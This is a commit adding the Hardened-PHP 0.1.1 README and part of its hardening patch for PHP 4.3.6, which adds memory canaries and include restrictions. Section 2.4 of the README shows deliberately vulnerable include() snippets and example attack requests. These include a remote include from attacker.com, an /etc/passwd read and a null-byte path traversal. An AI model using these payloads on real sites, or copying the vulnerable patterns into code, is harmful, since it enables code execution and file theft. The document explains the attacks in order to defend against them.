Add the first versionHEADmaster

2 files changed, 1910 insertions, 0 deletions

diff --git a/0.1.1/README b/0.1.1/README
new file mode 100644
index 0000000..0cb3c56
--- /dev/null
+++ b/0.1.1/README
@@ -0,0 +1,417 @@
+------------------------------------------------------------------------
+
+    _  _                _                     _       ___  _  _  ___ 
+   | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
+   | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
+   |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|  
+                                                         
+
+--[ Contents ]----------------------------------------------------------
+
+1 - Introduction
+  1.1 - What is Hardened-PHP
+  1.2 - Hardened-PHP's history
+  1.3 - Hardened-PHP's features
+  1.4 - Installing Hardened-PHP
+
+2 - The potential security problems
+  2.1 - Zend memory management
+  2.2 - Zend linked lists
+  2.3 - Format string functions
+  2.4 - Includes
+    2.4.1 - Remote includes
+    2.4.2 - Uploaded files
+    2.4.3 - String cuts
+    2.4.4 - Overlong filenames
+ 
+3 - The Implementation
+  3.1 - System compatibility
+  3.2 - Script compatibility
+  3.3 - Speed impact
+  3.4 - Memory Usage
+
+Appendix A - Project information
+
+Appendix B - Hardened-PHP signature key
+
+
+--[ 1 - Introduction ]--------------------------------------------------
+
+PHP is still the most popular script language and therefore used on
+millions of webservers around the globus. Because of this worldwide
+distribution it is vital that PHP scripts and the PHP engine itself are 
+made resistent against security exploits. 
+
+The Hardened-PHP project was launched to ensure this.
+
+----[ 1.1 - What is Hardened-PHP ]--------------------------------------
+
+Hardened-PHP adds security hardening features to PHP to protect your 
+servers on the one hand against a number of well known problems in 
+hastily written PHP scripts and on the other hand against potential 
+unknown vulnerabilities within the engine itself.
+
+----[ 1.2 - Hardened-PHP's history ]------------------------------------
+
+The idea to create a patched version of PHP which is resistent against
+a lot of attacks is maybe as old as PHP itself. In 2002 a few people
+from OpenBSD users created the PHP auditing project after I released
+my advisories aboute remote holes in PHP. The whole project was not
+really successfull. It seemed quite uncoordinated and the people all
+lost their interest because they never found anything. In the months
+since then I found several remote vulnerabilities in PHP before they
+could make it into a release version. However the codebase is quite
+large and therefore I decided to create Hardened-PHP. The project was
+pulled back several times because of lack of time.
+
+This was until the 17th of April 2004 when I released the first 
+version of Hardened-PHP which had already most of the features wanted
+for the first step. The project was not publicly announced until some
+stranger submitted a story about Hardened-PHP to symlink.ch. This was
+bringing some visitors to the page which was infact a ugly page with
+nearly no information, and no documentation.
+
+A month later at the 16th May 2004 the website was redesigned. Nothing
+professional but good enough for a start. Additionally this document
+was released in its first version to have a basic documentation. On the
+same day the Hardened-PHP 0.1.1 was released with just some small fixes
+for PHP and the patch itself.
+
+----[ 1.3 - Hardened-PHP's features ]-----------------------------------
+
+Hardened-PHP provides:
+
++ Protection of the Zend Memory Manager with canaries
++ Protection of Zend Linked Lists with canaries
++ Protection against internal format string exploits
++ Protection against arbitrary code inclusion
++ Syslog logging of attackers IP
+
+Hardened-PHP advertises itself as Hardened-PHP/x.y.z if you are running
+it as Apache module and have expose_php turned on. 
+
+----[ 1.4 - Installing Hardened-PHP ]-----------------------------------
+
+The process of installing a hardened PHP starts with downloading the
+PHP version supported by the current version of Hardened-PHP from
+
+        http://www.php.net/downloads.php
+
+After downloading the tarball into your temporary installation directory
+(f.e. /home/install) it is recommended that you check the md5sum of the 
+file before you continue. If the hash is correct you can start unpacking
+the tarball by issuing the command:
+
+        tar xfz php-x.y.z.tar.gz  
+
+Now download the Hardened-PHP patch (and it's GPG signature) from 
+
+        http://www.hardened-php.net/download.php
+        
+After checking the signature with GPG you can unpack and apply the patch
+
+        gunzip hardened-php-x.y.z-a.b.c.patch.gz
+        cd php-x.y.z
+        patch -p 1 < ../hardened-php-x.y.z-a.b.c.patch
+        
+From here follow the PHP manual howto install it ony your platform.
+
+
+--[ 2 - The potential security problems ]-------------------------------
+
+Because the featurelist of Hardened-PHP is quite cryptic for someone not
+into PHP and/or not into security, this chapter will provide an intro-
+duction into the problems that could arise if certain structures are
+overwritten or certain functions are used in an unsafe way.
+
+----[ 2.1 - Zend memory management ]------------------------------------
+
+When memory is allocated within PHP this is done with emalloc(). This
+function is a wrapperfunction for malloc() which implements (beside
+some things like a cache for small blocks) a double linked list of
+allocated memory blocks. This list is needed to free all allocated 
+memory at the end of request.
+
+       zend_mem_header                     emalloc() allocates more
+                                           memory than requested because
+    31  30             0                   it has to add 3 header fields
+     +-----------------+                   to the beginning of the block
+     |    p P r e v    |                   
+     +-----------------+                   It should be obvious that an
+     |    p N e x t    |                   overflow into this memory 
+     +---+-------------+                   will first overwrite the 
+     | C +   s i z e   |                   pPrev and pNext fields which
+     +---+-------------+  <--- returned    are the forward and backward
+     |                 |       pointer     pointers in the linked list
+     |                 |                   of allocated memory block.
+     |                 |                   Imagine you are able to 
+     |                 |                   overwrite these fields...
+     .                 .                   
+     .     d a t a     .                   What could actually happen
+     .                 .                   to this memoryblock?
+     |                 |                   It could either be efree()ed
+     |                 |                   or erealloc()ed. In both
+     |                 |                   cases the block is taken off
+     |                 |                   linked list.
+     +-----------------+                   
+                                           
+The remove operation is the standard linked list unlink common to many
+implementations of double linked lists.
+
+      p->pPrev->pNext = p->pNext  AND  p->pNext->pPrev = p->pPrev
+     
+This allows to overwrite nearly arbitrary addresses with nearly 
+arbitrary values if you control p->pPrev and p->pNext, which can lead
+to a code execution exploit.
+
+When Hardened-PHP is activated it will add so called canaries to the
+beginning and the end of each allocated block. These canaries are no
+birds but 32bit wide values which are randomly generated when the
+memory manager is started. Whenever the block is reallocated or freed
+the memory manager will check if the canary values have changed. This
+is sufficient to protect the unlink operations because an attacker 
+cannot guess the random values.
+
+Hardened-PHP uses 2 canaries because this protects against an overflow
+into emalloc()ed memory AND against an overflow out of such a block.
+
+Important: It is necessary to know that 3rd party libraries used by
+PHP will NOT use emalloc() but malloc() directly. This means that heap
+overflows could be still exploitable under some conditions. But this
+check is good enough to ensure that it is not the PHP memory that is
+abused to execute arbitrary code, which is good news because some libc
+versions have very hard/or impossible to exploit implementations of
+malloc(). On those systems heap overflows in PHP would be easily
+exploitable if Hardened-PHP is not activated.
+
+----[ 2.2 - Zend linked lists ]-----------------------------------------
+
+Many internal functions within PHP make use of zend linked lists. These
+lists have a structure which is also very vulnerable to overflows. If
+an attacker would be able cause PHP to overflow a part of memory that
+contains a linked list descriptor structure it would be possible to
+overwrite the stored pointer to the linked list dtor() with a pointer
+to any memory address. This would allow code execution when the list
+is destructed.
+
+Hardened-PHP adds canaries in front of the list descriptor structure
+to protect it against an overflow. Additionally a canary is added to 
+the end because sometimes the descriptors are stored in stack and the
+overflow would come from the other side. Because linked list elements
+are always in heap they only get a prefixed canary.
+
+Whenever an operation is performed on the linked list descriptor or
+one of its elements the canaries will get checked and when an overflow
+is detected the script will be aborted.
+
+----[ 2.3 - Format string functions ]-----------------------------------
+
+For a few years it is now known that format string functions can be
+abused if the format string is user supplied. This is because the %n
+specifier allows to write any values to arbitrary memory addresses.
+PHP comes with its own implementation of snprintf() and a memory self
+allocating variant spprintf(). Both functions implement the %n specifier
+which is not uses at all within PHP. 
+
+Hardened-PHP when activated removes the %n specifier from the internal
+snprintf() and spprintf() functions. Additionally a macro is set to
+replace all calls to the libc snprintf() with the PHP own version. This
+means, that if someone adds a format string bug to PHP in the future,
+it won't be exploitable. (Only if he makes the mistake in snprintf()
+or spprintf() - protecting sprintf() is on the todo list)
+
+----[ 2.4 - Includes ]--------------------------------------------------
+
+Like many other languages PHP allows to include other source files into
+the main script. This is done at execution time and even allows to
+include files on remote systems, which can become a huge security risk
+if the include statements are not protected in a proper way. Actually
+this is the most often used entrypoint of hackers when they succeed in
+hacking a site running a vulnerable PHP script.
+
+Hardened-PHP includes countermeasures for the most often seen mistakes.
+
+------[ 2.4.1 - Remote includes ]---------------------------------------
+
+A script like
+
+<?php
+        include $_REQUEST['aktion'];
+?>
+
+allows the user to supply any filename to the include statement from the
+outside. This means he can simply request
+
+        /vuln.php?aktion=/etc/passwd
+        
+to see your password file in his browser. It is obvious that an attacker
+who knows a way to embed PHP code into a file on your server will be
+able to execute it through this statement. (Examples are logfiles or
+session files). What is maybe new to any PHP beginner is that there is
+a feature called fopen_wrappers which allows to include a file from a
+remote system. This means if this feature is activated (which is the
+default setting) he may request
+
+        /vuln.php?aktion=http://attacker.com/his_code.dat
+        
+which includes any code of his choice. It is more than obvious that this
+feature can be a great security risk for any site that runs code written
+by PHP beginners but disabling this feature could also be a bad idea.
+This is because PHP does not allow to disable remote includes separately
+from remote file support for the other file access functions.
+
+If Hardened-PHP is activated it will disallow any include filename that
+looks like an URL and will log the attempt to syslog. Any URL is maybe
+to strict and will be relaxed in a future version. The strict rule is
+the reason why the fopencookie() regression test fails when Hardened-PHP
+is running.
+
+------[ 2.4.2 - Uploaded files ]----------------------------------------
+
+If the previous example is rewritten to make use of register_globals
+
+<?php
+        include $aktion;
+?>
+
+another not so well known way to include arbitrary code is possible.
+This can be used if fopen_wrappers is turned off but register_globals
+and file_uploads are turned on. In such a situation it is suffient to
+perform a post fileupload to the vulnerable script with aktion as name
+of the file variable. Because register_globals is turned on the variable
+$aktion will contain the temporary filename of the uploaded file. Of
+course this can contain arbitrary PHP code that would get executed
+under this circumstances.
+
+Hardened-PHP will stop such attacks because it does not allow including
+an uploaded file. Like with all violations it will get logged to syslog.
+
+------[ 2.4.3 - String cuts ]-------------------------------------------
+
+Many PHP programmers believe it is sufficient to pre- and postfix some
+controlled values to the userinput to completly protect an include-
+statement. That this assumption is wrong can be seen in this example:
+
+<?php
+        include "templates/".$_REQUEST['template'].".tmpl";
+?>
+
+The author of this code thinks that it is safe to include any file with
+a .tmpl extension on the system. While this maybe is true he forgets
+(or simply does not know) that PHP strings are binary safe, which means
+that anywhere within the userinput could be an ascii NUL char. For the
+underlying filesystem function this is considered as string terminator,
+which means, that a request for
+
+        /vuln.php?template=../../../../../../../etc/passwd%00
+         
+would infact include the /etc/passwd file because the %00 will truncate
+the extension ".tmpl" from the rest of the string. (This is only valid
+if magic_quotes_gpc is turned off)
+
+To protect against such attacks Hardened-PHP checks if the stringlength
+seen by the filesystem functions is equal to the binarysafe length. If
+they differ the file is not included and the attack is logged.
+
+------[ 2.4.4 - Overlong filenames ]------------------------------------
+
+When including a file Hardened-PHP checks that the supplied filename
+does not exceed the maximum path length. This is done because it doesn't
+add much overhead (for string cut protection we need strlen() anyway),
+but could protect against bufferoverflow attacks on the underlying 
+filesystem functions. If a filename triggers this check it will be
+logged to syslog.
+
+
+--[ 3 - The implementation ]--------------------------------------------
+
+This chapter discusses the compatibility, speed and memory issues which
+are caused by applying the Hardened-PHP patch.
+
+----[ 3.1 - System compatibility ]--------------------------------------
+
+Hardened-PHP is mainly developed on linux systems. This means new 
+versions may not compile on your operating system. I strongly recommend
+reporting such problems to the Hardened-PHP users mailinglist.
+
+----[ 3.2 - Script compatibility ]--------------------------------------
+
+Hardened-PHP passes the PHP 'make test' regression tests with the
+exception of the fopencookie() test. This is not caused by a bug within
+the implementation but by design of the include() protection feature. 
+At the time of writing this document Hardened-PHP simply forbids all 
+stream includes to protect against remote file inclusion. Without this 
+feature the fopencookie() test cannot work and therefore fails.
+
+Future versions of Hardened-PHP will partly restore stream inclusion
+support, to work around this limitation.
+
+----[ 3.3 - Speed impact ]----------------------------------------------
+
+It is believed that the few additional clock cycles spent on the extra
+sanity checks are marginal in comparison to the overhead which is caused
+by the protected functions within the memory management and filesystem
+access functions.
+
+A complete benchmark will be added to this section once it is achieved.
+
+----[ 3.4 - Memory usage ]----------------------------------------------
+
+Hardened-PHP adds canary protection to every allocated block of memory,
+to every linked list and to every linked list element. Additional every
+request remembers the triggering IP address. Combined this means an
+increased of used memory.
+
+This section will be filled with a memory usage benchmark in the future.
+
+
+--[ Appendix A - Project information ]----------------------------------
+
+At the time of writing Hardened-PHP is hosted on Sourceforge.
+
+The official homepage of Hardened-PHP is:
+
+http://www.hardened-php.org
+
+and the Sourceforge project page is reachable under:
+
+http://www.sourceforge.net/projects/hardened-php
+
+You can reach me (the author) directly through the email address
+sesser@php.net . When writing to this address please include the string
+Hardened-PHP in the subject line due to the amount of spam.
+
+You can use this address also to donate money to the project via Paypal.
+
+
+--[ Appendix B - Hardened-PHP signature key ]---------------------------
+
+To ensure authenticity of Hardened-PHP releases they are signed 
+with the following GPG key:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.0.6 (GNU/Linux)
+Comment: For info see http://www.gnupg.org
+
+mQGiBECBdjoRBAC5HMCaoPx30w6N4JLx09RfBLx6bo0//JWAaJKpjpvW1FviFNYs
+PXkyGrcrhhVxoh5dC8ByQgWSbT8XMpUv5tPQNwxO0ITbbAU9ipgg5BVDfc82/XaK
+Jr1jq243EQJN7rsce6PF13LIoxQ+LBdYHY6vw9a+9/IO5LMjNw7zW+5pswCg8M0Q
+2jnKZaIAhVCS27LJaUQaL68EAIl6I19HRE7RTJbhY0ZIrKGUKfx+KX0gHb8kXu6q
+WV5fmtO5fH34TrojhgUqBayLtwsxtXr+8QBMz0XNRDuebja8ZaVyLTx+EpI8Dyfm
+ob7vzlS3qJoNrW3h1kse50r/ilm87aB0JP6vwPlZDPC1lu2ZAGSUYEHml5dOmyCi
+5Z8tBACKFry60HlvWQzbnHCSSyMTIcagMnkVuyDDIR63RAqhEmyE7GXh2sYh6aPt
+AWag9ADQVFvTBhx+ssU5gpPahJr29QTrC4VCNTaO03O16qLmqkTKWHZCZbd4EPTg
+trswDZc1PLVwbP0j5RlH8/tQrbY9lMtuS5rUxtaFCLw4ZPWrh7QaSGFyZGVuZWQt
+UEhQIFNpZ25hdHVyZSBLZXmIXQQTEQIAHQUCQIF2OgUJAeEzgAULBwoDBAMVAwID
+FgIBAheAAAoJEEQ5FMwKhkqhSPAAnjXReigGNJXBsoX7z8/EvthX0cTIAJ9cSPil
+WwaTl2vtz7kyguZzRpZz8rkBDQRAgXY8EAQApLYBh8UCMUhDy5bR6Oj4vhMY6cJ4
+pIvwuaHbTXauBXS8UV5MwWvf/qcecM61Qe9SlZqWDTfT47tLgtR16PxmVhPJtQxH
+aRkrxXTKDu9P1evD1zX61/eNhDZw9+MPYMokxZMYS94s5uv/upKZZwu8XzdJtrK3
+YtaNAMn3tXQUKZMAAwUD/ieRxef28ZZ68emOe8KNfd5GP+8Ym7dkiidPBRLqgGmf
+V9AZbMdA2F8VfLuD6B5T5Lj9J35eTKijwLHDD5svl+2zPOSEtUB8mUVp2765kqeb
+jFW7WteKB9pEq59mfgHW5p5gnu66Fh5bggf8rKELj+0hw44F0IEXCQwyHlJ/3lQS
+iEwEGBECAAwFAkCBdjwFCQHhM4AACgkQRDkUzAqGSqG/wwCg7LlZpWdRL5QgUms5
+VVh+fdpHgPIAn3SIXWtsAS2T0Z0V6pjhSQz30ams
+=Gq1L
+-----END PGP PUBLIC KEY BLOCK-----
+
diff --git a/0.1.1/hardened-php-4.3.6-0.1.1.patch b/0.1.1/hardened-php-4.3.6-0.1.1.patch
new file mode 100644
index 0000000..b785d13
--- /dev/null
+++ b/0.1.1/hardened-php-4.3.6-0.1.1.patch
@@ -0,0 +1,1493 @@
+diff -Nur php-4.3.6.orig/Zend/zend.c hardened-php/Zend/zend.c
+--- php-4.3.6.orig/Zend/zend.c  Fri Apr 16 19:25:38 2004
++++ hardened-php/Zend/zend.c    Sun May 16 00:33:40 2004
+@@ -53,6 +53,12 @@
+ ZEND_API void (*zend_unblock_interruptions)(void);
+ ZEND_API void (*zend_ticks_function)(int ticks);
+ ZEND_API void (*zend_error_cb)(int type, const char *error_filename, const uint error_lineno, const char *format, va_list args);
++#if HARDENED_PHP
++ZEND_API void (*zend_security_log)(char *str);
++#endif
++#if HARDENED_PHP_INC_PROTECT
++ZEND_API int (*zend_is_valid_include)(zval *z);
++#endif
+ 
+ void (*zend_on_timeout)(int seconds TSRMLS_DC);
+ 
+@@ -422,6 +428,14 @@
+ #else
+        extern zend_scanner_globals ini_scanner_globals;
+        extern zend_scanner_globals language_scanner_globals;
++#endif
++
++       /* Set up Hardened-PHP utility functions first */
++#if HARDENED_PHP
++       zend_security_log = utility_functions->security_log_function;
++#endif
++#if HARDENED_PHP_INC_PROTECT
++       zend_is_valid_include = utility_functions->is_valid_include;
+ #endif
+ 
+ #ifdef ZTS
+diff -Nur php-4.3.6.orig/Zend/zend.h hardened-php/Zend/zend.h
+--- php-4.3.6.orig/Zend/zend.h  Fri Apr 16 19:25:38 2004
++++ hardened-php/Zend/zend.h    Sun May 16 00:33:40 2004
+@@ -324,6 +324,12 @@
+        void (*ticks_function)(int ticks);
+        void (*on_timeout)(int seconds TSRMLS_DC);
+        zend_bool (*open_function)(const char *filename, struct _zend_file_handle *);
++#if HARDENED_PHP
++       void (*security_log_function)(char *str);
++#endif 
++#if HARDENED_PHP_INC_PROTECT
++       int (*is_valid_include)(zval *z);
++#endif
+ } zend_utility_functions;
+ 
+                
+@@ -455,7 +461,16 @@
+ extern ZEND_API void (*zend_ticks_function)(int ticks);
+ extern ZEND_API void (*zend_error_cb)(int type, const char *error_filename, const uint error_lineno, const char *format, va_list args) ZEND_ATTRIBUTE_PTR_FORMAT(printf, 4, 0);
+ extern void (*zend_on_timeout)(int seconds TSRMLS_DC);
++#if HARDENED_PHP
++extern ZEND_API        void (*zend_security_log)(char *str);
++#endif 
++#if HARDENED_PHP_INC_PROTECT
++extern ZEND_API int (*zend_is_valid_include)(zval *z);
++#endif
+ 
++#if HARDENED_PHP_MM_PROTECT || HARDENED_PHP_LL_PROTECT
++ZEND_API unsigned int zend_canary(void);
++#endif
+ 
+ ZEND_API void zend_error(int type, const char *format, ...) ZEND_ATTRIBUTE_PTR_FORMAT(printf, 2, 3);
+ 
+diff -Nur php-4.3.6.orig/Zend/zend_alloc.c hardened-php/Zend/zend_alloc.c
+--- php-4.3.6.orig/Zend/zend_alloc.c    Fri Apr 16 19:25:38 2004
++++ hardened-php/Zend/zend_alloc.c      Sun May 16 00:41:04 2004
+@@ -56,6 +56,11 @@
+ # define END_MAGIC_SIZE 0
+ #endif
+ 
++#if HARDENED_PHP_MM_PROTECT
++# define CANARY_SIZE sizeof(unsigned int)
++#else
++# define CANARY_SIZE 0
++#endif
+ 
+ # if MEMORY_LIMIT
+ #  if ZEND_DEBUG
+@@ -129,6 +134,12 @@
+        DECLARE_CACHE_VARS();
+        TSRMLS_FETCH();
+ 
++#if HARDENED_PHP_MM_PROTECT
++       if (size > LONG_MAX - sizeof(zend_mem_header) - MEM_HEADER_PADDING - END_MAGIC_SIZE - CANARY_SIZE) {
++               zend_security_log("emalloc() - requested size would result in integer overflow");
++               exit(1);
++       }
++#endif
+        CALCULATE_REAL_SIZE_AND_CACHE_INDEX(size);
+ 
+        if (!ZEND_DISABLE_MEMORY_CACHE && (CACHE_INDEX < MAX_CACHED_MEMORY) && (AG(cache_count)[CACHE_INDEX] > 0)) {
+@@ -146,6 +157,10 @@
+                AG(cache_stats)[CACHE_INDEX][1]++;
+                memcpy((((char *) p) + sizeof(zend_mem_header) + MEM_HEADER_PADDING + size), &mem_block_end_magic, sizeof(long));
+ #endif
++#if HARDENED_PHP_MM_PROTECT
++               p->canary = AG(canary_1);
++               memcpy((((char *) p) + sizeof(zend_mem_header) + MEM_HEADER_PADDING + size + END_MAGIC_SIZE), &AG(canary_2), CANARY_SIZE);
++#endif
+                p->cached = 0;
+                p->size = size;
+                return (void *)((char *)p + sizeof(zend_mem_header) + MEM_HEADER_PADDING);
+@@ -155,7 +170,13 @@
+                        AG(cache_stats)[CACHE_INDEX][0]++;
+                }
+ #endif
+-               p  = (zend_mem_header *) ZEND_DO_MALLOC(sizeof(zend_mem_header) + MEM_HEADER_PADDING + SIZE + END_MAGIC_SIZE);
++#if MEMORY_LIMIT
++               CHECK_MEMORY_LIMIT(size, SIZE);
++               if (AG(allocated_memory) > AG(allocated_memory_peak)) {
++                       AG(allocated_memory_peak) = AG(allocated_memory);
++               }
++#endif
++               p  = (zend_mem_header *) ZEND_DO_MALLOC(sizeof(zend_mem_header) + MEM_HEADER_PADDING + SIZE + END_MAGIC_SIZE + CANARY_SIZE);
+        }
+ 
+        HANDLE_BLOCK_INTERRUPTIONS();
+@@ -185,11 +206,9 @@
+ # endif
+        memcpy((((char *) p) + sizeof(zend_mem_header) + MEM_HEADER_PADDING + size), &mem_block_end_magic, sizeof(long));
+ #endif
+-#if MEMORY_LIMIT
+-       CHECK_MEMORY_LIMIT(size, SIZE);
+-       if (AG(allocated_memory) > AG(allocated_memory_peak)) {
+-               AG(allocated_memory_peak) = AG(allocated_memory);
+-       }
++#if HARDENED_PHP_MM_PROTECT
++       p->canary = AG(canary_1);
++       memcpy((((char *) p) + sizeof(zend_mem_header) + MEM_HEADER_PADDING + size + END_MAGIC_SIZE), &AG(canary_2), CANARY_SIZE);
+ #endif
+ 
+        HANDLE_UNBLOCK_INTERRUPTIONS();
+@@ -218,17 +237,33 @@
+                        return emalloc_rel(lval + offset);
+                }
+        }
+-
++       
++#if HARDENED_PHP
++       zend_security_log("Possible integer overflow catched by safe_emalloc()");
++#endif
+        zend_error(E_ERROR, "Possible integer overflow in memory allocation (%ld * %ld + %ld)", nmemb, size, offset);
+        return 0;
+ }
+ 
+ ZEND_API void _efree(void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
+ {
++#if HARDENED_PHP_MM_PROTECT
++       unsigned int *canary_2;
++#endif
+        zend_mem_header *p = (zend_mem_header *) ((char *)ptr - sizeof(zend_mem_header) - MEM_HEADER_PADDING);
+        DECLARE_CACHE_VARS();
+        TSRMLS_FETCH();
+ 
++#if HARDENED_PHP_MM_PROTECT
++       canary_2 = (((char *) p) + sizeof(zend_mem_header) + MEM_HEADER_PADDING + p->size + END_MAGIC_SIZE);
++       if (p->canary != AG(canary_1) || *canary_2 != AG(canary_2)) {
++               zend_security_log("canary mismatch on efree() - heap overflow or double efree detected");
++               exit(1);
++       }
++       /* to catch double efree()s */
++       *canary_2 = p->canary = 0;
++#endif
++
+ #if defined(ZTS) && TSRM_DEBUG
+        if (p->thread_id != tsrm_thread_id()) {
+                tsrm_error(TSRM_ERROR_LEVEL_ERROR, "Memory block allocated at %s:(%d) on thread %x freed at %s:(%d) on thread %x, ignoring",
+@@ -273,6 +308,9 @@
+        size_t _size = nmemb * size;
+     
+        if (nmemb && (_size/nmemb!=size)) {
++#if HARDENED_PHP
++               zend_security_log("Possible integer overflow catched by ecalloc()");
++#endif
+                fprintf(stderr,"FATAL:  ecalloc():  Unable to allocate %ld * %ld bytes\n", (long) nmemb, (long) size);
+ #if ZEND_DEBUG && HAVE_KILL && HAVE_GETPID
+                kill(getpid(), SIGSEGV);
+@@ -292,6 +330,9 @@
+ 
+ ZEND_API void *_erealloc(void *ptr, size_t size, int allow_failure ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
+ {
++#if HARDENED_PHP_MM_PROTECT
++       unsigned int canary_2;
++#endif
+        zend_mem_header *p;
+        zend_mem_header *orig;
+        DECLARE_CACHE_VARS();
+@@ -303,6 +344,14 @@
+ 
+        p = orig = (zend_mem_header *) ((char *)ptr-sizeof(zend_mem_header)-MEM_HEADER_PADDING);
+ 
++#if HARDENED_PHP_MM_PROTECT
++       canary_2 = *(unsigned int *)(((char *) p) + sizeof(zend_mem_header) + MEM_HEADER_PADDING + p->size + END_MAGIC_SIZE);
++       if (p->canary != AG(canary_1) || canary_2 != AG(canary_2)) {
++               zend_security_log("canary mismatch on erealloc() - heap overflow detected");
++               exit(1);
++       }
++#endif
++
+ #if defined(ZTS) && TSRM_DEBUG
+        if (p->thread_id != tsrm_thread_id()) {
+                void *new_p;
+@@ -319,8 +368,14 @@
+        CALCULATE_REAL_SIZE_AND_CACHE_INDEX(size);
+ 
+        HANDLE_BLOCK_INTERRUPTIONS();
++#if MEMORY_LIMIT
++       CHECK_MEMORY_LIMIT(size - p->size, SIZE - REAL_SIZE(p->size));
++       if (AG(allocated_memory) > AG(allocated_memory_peak)) {
++               AG(allocated_memory_peak) = AG(allocated_memory);
++       }
++#endif
+        REMOVE_POINTER_FROM_LIST(p);
+-       p = (zend_mem_header *) ZEND_DO_REALLOC(p, sizeof(zend_mem_header)+MEM_HEADER_PADDING+SIZE+END_MAGIC_SIZE);
++       p = (zend_mem_header *) ZEND_DO_REALLOC(p, sizeof(zend_mem_header)+MEM_HEADER_PADDING+SIZE+END_MAGIC_SIZE+CANARY_SIZE);
+        if (!p) {
+                if (!allow_failure) {
+                        fprintf(stderr,"FATAL:  erealloc():  Unable to allocate %ld bytes\n", (long) size);
+@@ -341,14 +396,11 @@
+        p->magic = MEM_BLOCK_START_MAGIC;
+        memcpy((((char *) p) + sizeof(zend_mem_header) + MEM_HEADER_PADDING + size), &mem_block_end_magic, sizeof(long));
+ #endif 
+-#if MEMORY_LIMIT
+-       CHECK_MEMORY_LIMIT(size - p->size, SIZE - REAL_SIZE(p->size));
+-       if (AG(allocated_memory) > AG(allocated_memory_peak)) {
+-               AG(allocated_memory_peak) = AG(allocated_memory);
+-       }
+-#endif
+ 
+        p->size = size;
++#if HARDENED_PHP_MM_PROTECT
++       memcpy((((char *) p) + sizeof(zend_mem_header) + MEM_HEADER_PADDING + size + END_MAGIC_SIZE), &AG(canary_2), CANARY_SIZE);
++#endif
+ 
+        HANDLE_UNBLOCK_INTERRUPTIONS();
+        return (void *)((char *)p+sizeof(zend_mem_header)+MEM_HEADER_PADDING);
+@@ -423,6 +475,10 @@
+ {
+        AG(head) = NULL;
+        
++#if HARDENED_PHP_MM_PROTECT
++       AG(canary_1) = zend_canary();
++       AG(canary_2) = zend_canary();
++#endif
+ #if MEMORY_LIMIT
+        AG(memory_limit) = 1<<30;               /* ridiculous limit, effectively no limit */
+        AG(allocated_memory) = 0;
+diff -Nur php-4.3.6.orig/Zend/zend_alloc.h hardened-php/Zend/zend_alloc.h
+--- php-4.3.6.orig/Zend/zend_alloc.h    Fri Apr 16 19:25:38 2004
++++ hardened-php/Zend/zend_alloc.h      Sun May 16 00:33:40 2004
+@@ -32,6 +32,9 @@
+ #define MEM_BLOCK_CACHED_MAGIC 0xFB8277DCL
+ 
+ typedef struct _zend_mem_header {
++#if HARDENED_PHP_MM_PROTECT
++       unsigned int canary;
++#endif
+ #if ZEND_DEBUG
+        long magic;
+        char *filename;
+diff -Nur php-4.3.6.orig/Zend/zend_builtin_functions.c hardened-php/Zend/zend_builtin_functions.c
+--- php-4.3.6.orig/Zend/zend_builtin_functions.c        Fri Apr 16 19:25:38 2004
++++ hardened-php/Zend/zend_builtin_functions.c  Sun May 16 00:33:40 2004
+@@ -49,6 +49,9 @@
+ static ZEND_FUNCTION(crash);
+ #endif
+ #endif
++#if HARDENED_PHP_MM_PROTECT_DEBUG
++static ZEND_FUNCTION(heap_overflow);
++#endif
+ static ZEND_FUNCTION(get_included_files);
+ static ZEND_FUNCTION(is_subclass_of);
+ static ZEND_FUNCTION(is_a);
+@@ -101,6 +104,9 @@
+        ZEND_FE(crash,                          NULL)
+ #endif
+ #endif
++#if HARDENED_PHP_MM_PROTECT_DEBUG
++       ZEND_FE(heap_overflow,                  NULL)
++#endif
+        ZEND_FE(get_included_files,     NULL)
+        ZEND_FALIAS(get_required_files, get_included_files,             NULL)
+        ZEND_FE(is_subclass_of,         NULL)
+@@ -804,6 +810,19 @@
+ #endif
+ 
+ #endif /* ZEND_DEBUG */
++
++
++#if HARDENED_PHP_MM_PROTECT_DEBUG
++ZEND_FUNCTION(heap_overflow)
++{
++       char *nowhere = emalloc(10);
++
++       memcpy(nowhere, "something1234567890", sizeof("something1234567890"));
++       
++       efree(nowhere);
++}
++#endif
++
+ 
+ /* {{{ proto array get_included_files(void)
+    Returns an array with the file names that were include_once()'d */
+diff -Nur php-4.3.6.orig/Zend/zend_canary.c hardened-php/Zend/zend_canary.c
+--- php-4.3.6.orig/Zend/zend_canary.c   Thu Jan  1 01:00:00 1970
++++ hardened-php/Zend/zend_canary.c     Sun May 16 00:33:40 2004
+@@ -0,0 +1,58 @@
++/*
++   +----------------------------------------------------------------------+
++   | Hardened-PHP                                                         |
++   +----------------------------------------------------------------------+
++   | Copyright (c) 2004 Stefan Esser                                      |
++   +----------------------------------------------------------------------+
++   | This source file is subject to version 2.02 of the PHP license,      |
++   | that is bundled with this package in the file LICENSE, and is        |
++   | available at through the world-wide-web at                           |
++   | http://www.php.net/license/2_02.txt.                                 |
++   | If you did not receive a copy of the PHP license and are unable to   |
++   | obtain it through the world-wide-web, please send a note to          |
++   | license@php.net so we can mail you a copy immediately.               |
++   +----------------------------------------------------------------------+
++   | Author: Stefan Esser <sesser@php.net>                        |
++   +----------------------------------------------------------------------+
++ */
++/* $Id: hardened_php.c,v 1.51.2.4 2003/03/17 13:50:23 wez Exp $ */
++
++#include "zend.h"
++
++#include <stdio.h>
++#include <stdlib.h>
++
++
++#if HARDENED_PHP_MM_PROTECT || HARDENED_PHP_LL_PROTECT
++
++/* will be replaced later with more compatible method */
++ZEND_API unsigned int zend_canary()
++{
++       time_t t;
++       unsigned int canary;
++       int fd;
++       
++       fd = open("/dev/urandom", 0);
++       if (fd != -1) {
++               int r = read(fd, &canary, sizeof(canary));
++               close(fd);
++               if (r == sizeof(canary)) {
++                       return (canary);
++               }
++       }
++       /* not good but we never want to do this */
++       time(&t);
++       canary = *(unsigned int *)&t + getpid() << 16;
++       return (canary);
++}
++#endif
++
++
++/*
++ * Local variables:
++ * tab-width: 4
++ * c-basic-offset: 4
++ * End:
++ * vim600: sw=4 ts=4 fdm=marker
++ * vim<600: sw=4 ts=4
++ */
